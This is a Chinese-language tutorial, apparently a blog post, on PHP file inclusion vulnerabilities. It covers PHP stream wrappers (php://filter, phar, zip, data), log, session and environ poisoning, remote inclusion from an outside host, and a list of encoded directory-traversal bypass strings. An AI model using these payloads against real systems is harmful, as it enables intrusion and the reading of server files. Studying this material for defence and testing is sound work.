【文件包含】PHP文件包含漏洞

0x01 文件包含函数

  • include()
  • include_once()
  • require()
  • require_once()

这里include()函数如果在包含的过程中发生错误,会发出警告,但是会继续执行后续代码;
require()函数如果在包含的过程中发生错误,会报错退出,并且不再执行之后的代码。
include_once()和require_once()的功能跟include()和require()类似,只不过前者如果已经包含了文件,那么就不会包含第二次,以免出现函数重定义或变量重赋值的问题。

以上四个函数不管包含的文件类型是什么,都会当作php文件进行解析,例如
phpinfo.txt

lfi.php


【文件包含】PHP文件包含漏洞_第1张图片

成功执行phpinfo()!

0x02 文件包含分类

1. LFI(本地文件包含)

本地文件包含就是包含服务器本地的文件。

2. RFI(远程文件包含)

远程文件包含就是包含远程服务器上的文件,这样我们就可以自定义自己想要执行的代码,因此危害比较大。远程文件包含需要一定的条件
php.ini配置

allow_url_fopen=On(默认开启)
allow_url_include=On(默认关闭)

0x03 php伪协议

假设服务器lfi.php内容如下


php://input

使用条件

allow_url_include=On(默认关闭)
allow_url_fopen不做要求(默认开启)
【文件包含】PHP文件包含漏洞_第2张图片
【文件包含】PHP文件包含漏洞_第3张图片

php://filter

使用条件:无

··
?c=php://filter/read=convert.base64-encode/resource=xxx
或者
?c=php://filter/convert.base64-encode/resource=xxx
···
通过指定resource的值来读取文件,读取的文件是base64加密后的,读取到后解一下就好了。

【文件包含】PHP文件包含漏洞_第4张图片

phar://*

使用条件:php版本大于等于5.3.0

假设需要读取的文件是phpinfo.txt,将其压缩成zip文件(phpinfo.zip)

【文件包含】PHP文件包含漏洞_第5张图片

然后指定文件的绝对路径

?c=phar://C://wamp64/www/phpinfo.zip/phpinfo.txt
【文件包含】PHP文件包含漏洞_第6张图片

或者使用相对路径(这里phpinfo.zip就在当前路径)

?c=phar://phpinfo.zip/phpinfo.txt
【文件包含】PHP文件包含漏洞_第7张图片

zip://

使用条件:php版本大于等于5.3.0

zip://与phar://的使用类似,但是需要绝对路径, zip文件后面要跟%23加zip文件里的文件

?c=zip://C:/wamp64/www/phpinfo.zip%23phpinfo.txt
【文件包含】PHP文件包含漏洞_第8张图片

data:URL schema

使用条件:
php版本大于等于5.2.0
allow_url_include=On(默认关闭)
allow_url_fopen=On(默认开启)

?c=data:text/plain,
【文件包含】PHP文件包含漏洞_第9张图片

或者

?c=data:text/plain;base64,PD9waHAgcGhwaW5mbygpOz8%2b
【文件包含】PHP文件包含漏洞_第10张图片

session文件包含

使用条件:session文件路径已知,并且内容部分可控

session文件路径可以在phpinfo中session.save_path得到

一般情况下session文件都在/tmp目录下
命名格式:sess_[phpsessid],而phpsessid可以在cookie中得到

要包含并利用的话,需要能控制部分sesssion文件的内容。暂时没有通用的办法。有些时候,可以先包含进session文件,观察里面的内容,然后根据里面的字段来发现可控的变量,从而利用变量来写入payload,并之后再次包含从而执行php代码。

包含日志文件

使用条件: 需要知道日志文件的目录,并且日志文件可读

当我们访问服务器的时候,访问的请求会被记录到access.log,当发生错误的时候会把错误写入到error.log,一般日志的路径linux下是/var/logs/apache2,windows下wamp在/wamp/logs
但是如果我们直接请求的话,一些特殊字符会被url编码从而导致包含后无法解析

可以用burp抓包后改包即可。

之后就可以包含进行利用啦

【文件包含】PHP文件包含漏洞_第11张图片

包含ssh-log

使用条件:ssh日志路径已知,并且可读,默认情况下在/var/log/auth.log

ssh ''@remotehost

之后密码随便写
之后包含日志文件就好啦

environ

使用条件:

  1. php以cgi方式运行,这样environ才会保持UA头。
  2. environ文件存储位置已知,且environ文件可读。

proc/self/environ中会保存user-agent头。如果在user-agent中插入php代码,则php代码会被写入到environ中。之后再包含它,即可。

条件竞争

0x04 绕过姿势

指定前缀



目录遍历

可以用../进行目录遍历,访问其他目录的文件

编码

但有的时候,服务器通常会把../过滤掉,这个时候可以用编码进行绕过
利用url编码
%2e%2e%5c
..%5c
%2e%2e
%2e%2e%2f
..%2f
%2e%2e/
../
..\

二次编码
%252e%252e%255c
%252e%252e%252f
../
..\

容器/服务器的编码方式
../
..%c0%af
%c0%ae%c0%ae/
注:Why does Directory traversal attack %C0%AF work?(https://security.stackexchange.com/questions/48879/why-does-directory-traversal-attack-c0af-work)

%c0%ae%c0%ae/
注:java中会把”%c0%ae”解析为”\uC0AE”,最后转义为ASCCII字符的”.”(点)
Apache Tomcat Directory Traversal
..
..%c1%9c

指定后缀


?问号绕过

index.php?file=http://remoteaddr/remoteinfo.txt?

问号后面的部分/test/test.php,也就是指定的后缀被当作query从而被绕过。注意需要把#进行url编码为%23。

利用zip协议

可以构造跟后缀一样的路径,再打包成zip文件,然后利用zip协议包含即可

你可能感兴趣的:(【文件包含】PHP文件包含漏洞)